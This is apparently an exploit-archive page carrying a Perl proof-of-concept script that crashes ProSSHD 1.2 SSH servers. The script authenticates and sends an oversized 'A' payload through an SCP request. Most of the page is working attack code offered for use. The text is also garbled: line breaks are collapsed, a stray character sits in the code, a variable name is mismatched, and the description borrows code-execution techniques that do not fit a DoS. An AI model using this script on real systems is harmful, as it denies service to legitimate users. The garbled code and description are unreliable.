Headline
ProSSHD 1.2 20090726 Denial Of Service
ProSSHD version 1.2 20090726 remote denial of service exploit.
#!/usr/bin/perluse Net::SSH2# Exploit Title: ProSSHD 1.2 20090726 - Denial of Service (DoS)# Discovery by: Fernando Mengali# Discovery Date: 13 january 2024# Vendor Homepage: https://prosshd.com/# Notification vendor: No reported# Tested Version: ProSSHD 1.2 20090726# Tested on: Window XP Professional - Service Pack 2 and 3 - English# Vulnerability Type: Denial of Service (DoS)#1. Description#His technique works fine against Windows XP Professional Service Pack 2 and 3 (English).#For this exploit I have tried several strategies to increase reliability and performance:#Jump to a static 'call esp'#Backwards jump to code a known distance from the stack pointer.#The server did not properly handle request with large amounts of data to SSH.#The following request sends a large amount of data to the SSH to process, the server will crash as soon as it is received and processed, causing denial of service conditions.#Successful exploitation of these issues allows remote attackers to crash the affected server, denying service to legitimate users.#2. Proof of Concept - PoC $sis="$^O"; if ($sis eq "windows"){ $cmd="cls"; } else {s $cmd="clear"; } system("$cmd"); intro(); main();print "\t ==> Connecting to webserver... \n\n";sleep(1);my $i=0; print "\t ==> Exploiting... \n\n";my $payload = "\x41" x 500;$connection2 = Net::SSH2->new();$connection2->connect($host, $port) || die "\nError: Connection Refused!\n";$connection2->auth_password($username, $password) || die "\nError: Username/Password Denied!\n";$scpget = $connection2->scp_get($payload);$connection2->disconnect();print "\t ==> Done! Exploited!"; sub intro { print q { ,--, _ ___/ /\| ,;'( )__, ) ~ // // '--; ' \ | ^ ^ ^ [+] ProSSHD 1.2 20090726 - Denial of Service (DoS) [*] Coded by Fernando Mengali [@] e-mail: [email protected] } } sub main {our ($ip, $port, $username, $password) = @ARGV; unless (defined($ip) && defined($port)) { print "\n\tUsage: $0 <ip> <port> <username> <password> \n"; exit(-1); } }#3. Solution/ How to fix:# This version product is deprecated